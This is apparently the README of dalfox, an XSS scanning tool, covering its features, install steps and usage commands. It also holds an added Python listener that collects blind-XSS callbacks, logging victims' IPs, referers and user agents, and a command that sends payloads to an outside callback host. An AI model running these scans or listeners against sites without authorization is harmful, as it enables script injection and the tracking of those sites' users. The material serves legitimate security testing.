dalfox

Looking for the Go (v2.x) version? Dalfox v3 is a complete rewrite in Rust. The Go codebase is preserved on the v2 branch and continues to receive security backports. See SECURITY.md for the support policy.

Dalfox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

Key features

  • Subcommands: scan (URL / file / pipe / raw-HTTP, auto-detected), server, payload, mcp
  • Discovery: Parameter analysis, static analysis, BAV testing, parameter mining
  • XSS Scanning: Reflected, Stored (SXSS), DOM-based, with optimization and DOM/AST verification
  • WAF: Fingerprinting with confidence scoring, bypass tracking, and tunable --waf-min-confidence
  • HTTP Options: Custom headers, cookies, methods, proxy, and more
  • Output: JSON/JSONL/Plain/Markdown/SARIF/TOML formats, silence mode, detailed reports
  • Extensibility: REST API, MCP stdio server, custom payloads, remote wordlists

Plus the many options needed for real-world testing :D

Installation

Homebrew (macOS/Linux)

brew install dalfox

# https://formulae.brew.sh/formula/dalfox

Snapcraft (Ubuntu)

sudo snap install dalfox

Nixpkgs (NixOS)

A package is available for Nix or NixOS users. Keep in mind that the latest releases might only be present in the unstable channel.

nix-shell -p dalfox

Nix Flakes

For Nix users with flakes enabled:

# Run directly
nix run github:hahwul/dalfox -- scan https://example.com

# Install
nix profile install github:hahwul/dalfox

# Development environment
nix develop github:hahwul/dalfox

See Installation guide for details.

Usage

dalfox [mode] [target] [flags]
  • Single URL: dalfox url http://example.com -b https://callback
  • File Mode: dalfox file urls.txt --custom-payload mypayloads.txt
  • Pipeline: cat urls.txt | dalfox pipe -H "AuthToken: xxx"

Check the Usage and Running documents for more examples.
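The single-URL example above passes a blind XSS callback with `-b https://callback`. Dalfox only needs a URL it can embed in its payloads; the listener on the other end is something you run yourself. The following is an added example of such a receiver, not code from the Dalfox project: a small Python HTTP server that records every hit to a JSONL file with the fields that turn a callback into a finding (the `Referer`, which is the page that actually executed the payload, the query string, the client IP and the User-Agent). The port, log path and `/cb` route are assumptions for illustration; point `-b` at `http://<your-host>:8443/cb` or whatever you choose.

```python
"""Minimal blind-XSS callback receiver to pair with dalfox's -b flag.

Added example, not part of the dalfox project. Assumes you run
`dalfox ... -b http://<your-host>:8443/cb` against this listener.
Nothing about dalfox's payload format is assumed, only that a browser
rendering the stored payload will fetch the callback URL.
"""
import json
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

LOG_PATH = "blind_xss_hits.jsonl"  # assumed default; change as needed


def record_hit(method, path, headers, client_ip, ts=None):
    """Normalise one callback request into a JSON-serialisable dict.

    `headers` is any mapping with .get() (http.server gives an
    email.message.Message; tests can pass a plain dict).
    """
    parsed = urlparse(path)
    qs = parse_qs(parsed.query, keep_blank_values=True)
    return {
        "ts": ts if ts is not None else int(time.time()),
        "client_ip": client_ip,
        "method": method,
        "path": parsed.path,
        # Flatten single-valued query params; keep lists for repeats.
        "query": {k: v[0] if len(v) == 1 else v for k, v in qs.items()},
        # Referer is the page whose context executed the payload: the finding.
        "referer": headers.get("Referer"),
        "user_agent": headers.get("User-Agent"),
        "origin": headers.get("Origin"),
    }


class CallbackHandler(BaseHTTPRequestHandler):
    def _handle(self):
        hit = record_hit(self.command, self.path, self.headers,
                         self.client_address[0])
        with open(LOG_PATH, "a", encoding="utf-8") as fh:
            fh.write(json.dumps(hit) + "\n")
        body = b"ok"
        self.send_response(200)
        # Permissive CORS so fetch()/XHR-based payloads from any origin
        # complete instead of being blocked before the request is logged.
        self.send_header("Access-Control-Allow-Origin", "*")
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    # Image/script-src payloads arrive as GET; fetch()/beacons may POST or
    # preflight with OPTIONS. Log all of them the same way.
    do_GET = do_POST = do_OPTIONS = _handle

    def log_message(self, *args):
        # Hits are written to LOG_PATH; silence the default stderr log.
        pass


def serve(host="0.0.0.0", port=8443):
    """Block forever serving callbacks (port is an assumed default)."""
    HTTPServer((host, port), CallbackHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Run it on a host the target's users can reach, then review `blind_xss_hits.jsonl`: a hit whose `referer` points at the application under test (rather than your own browser) is a confirmed stored or out-of-band execution, and the `query` field is where you would carry a per-parameter marker so the hit can be mapped back to the injection point.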

Contributing

If you want to contribute to this project, please see CONTRIBUTING.md and open a pull request with your cool contents.

About the Name

As for the name, Dal(달) is the Korean word for "moon," while "Fox" stands for "Finder Of XSS" or 🦊
